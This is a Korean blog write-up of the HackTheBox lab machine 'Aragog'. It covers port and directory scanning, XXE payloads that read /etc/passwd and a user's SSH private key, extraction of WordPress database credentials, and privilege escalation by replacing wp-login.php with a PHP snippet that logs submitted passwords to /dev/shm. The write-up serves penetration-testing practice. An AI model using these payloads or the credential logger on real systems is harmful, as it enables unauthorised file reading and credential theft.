본문 바로가기
Hacking/HackTheBox

aragog (Linux)

SurTesterS 2024. 11. 4. 23:10

정찰

─# nmap -p- -sT --min-rate=100000 10.129.119.26
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-04 20:08 KST
Warning: 10.129.119.26 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.119.26
Host is up (0.28s latency).
Not shown: 61476 closed tcp ports (conn-refused), 4056 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# nmap -p 21,22,80 -sCV --min-rate=100000 10.129.119.26
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-04 20:10 KST
Nmap scan report for 10.129.119.26
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds
┌──(root㉿BOOK-2S941CKO4U)-[/home/surckers/list]
└─# ffuf -u http://aragog.htb/FUZZ.php -w directory-list-lowercase-2.3-big.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://aragog.htb/FUZZ.php
 :: Wordlist         : FUZZ: /home/surckers/list/directory-list-lowercase-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# Copyright 2007 James Fisher [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 281ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 281ms]
# Priority ordered case insensative list, where entries were found  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 282ms]
# directory-list-lowercase-2.3-big.txt [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 282ms]
                        [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 287ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 1775ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2777ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2778ms]
# on atleast 1 host     [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2780ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 3782ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4787ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4789ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4790ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4790ms]
hosts                   [Status: 200, Size: 46, Words: 7, Lines: 4, Duration: 285ms]

 

 

ftp 접속 (anonymous)

xml 파일 처럼 생겼다

 

Exploit

XXE Injection 시도

 <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<details>
   <subnet_mask>&ent;</subnet_mask>
    <test>
&ent;
</test>
</details>

와우~!

 

/bin/bash 중 /home 디렉터리를 가지고 있는 계정에 대해,

 

/home 디렉터리의 user.txt 조회 시도 시 조회 안됨

/home/florian/user.txt

/home/cliff/user.txt

 

 <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
   <subnet_mask>&ent;</subnet_mask>
    <test>
&ent;
</test>
</details>

ssh 비밀키는 확인가능

 

 

해당 비밀키로 서버 접속 수행

 

권한 상승

1. 일단, sudo -l  => X

 

2. 웹페이지 구동 폴더에 들어가보면,

워드프레스 페이지 띄워져 있는 것 확인 가능

wp-config.php 파일에서 db 접속정보 획득 가능

florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_wiki');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 

해당 정보로 db 접근

florian@aragog:/var/www/html/dev_wiki$ mysql -u root -p -h localhost -D wp_wiki
Enter password:

 

 

hashcat 으로 hash 원문 획득 못하였다.
(admin 으로 로그인 해서, wp-admin의 파일 업로드 기능 사용해서, 악성코드 업로드 생각이었음. 업로드 하면 cliff 권한으로 파일이 업로드 되는건가 함..)

 

3. linpease 수행 해봄

scp 명령어로 linpease.sh 전송

scp -i id_rsa_florian linpeas.sh florian@10.129.118.255:/home/florian
linpeas.sh

쓸만한 정보는 cron 을 admin 으로 수행하는데. cliff 계정으로  wp-login.py 수행

login 페이지 호출 할 것이며, 거기에 로그인 정보가 담겨 있을 것이다.

 

wp-login.php 파일을 변경해서 해당 호출하는 정보 획득 예정

 

<?php
$rrr = print_r($_REQUEST, true);
$fff = fopen("/dev/shm/df", "a");
fwrite($fff, $rrr);
fclose($fff);

위와 같이 내용 바꾸고 chmod +777 로 권한 변경 시

패스워드 획득 가능하며,

su로 접근 시 root로 비번 입력 후 접근 가능

 

 

2776번째~!

'Hacking > HackTheBox' 카테고리의 다른 글

Administrator  (1) 2024.11.26
Certified (Windows · Medium)  (0) 2024.11.11
Devel (win)  (1) 2024.10.23
MonitorsThree (Linux · Medium)  (1) 2024.09.25
secnotes (win)  (1) 2024.08.05

'Hacking/HackTheBox' Related Articles

티스토리툴바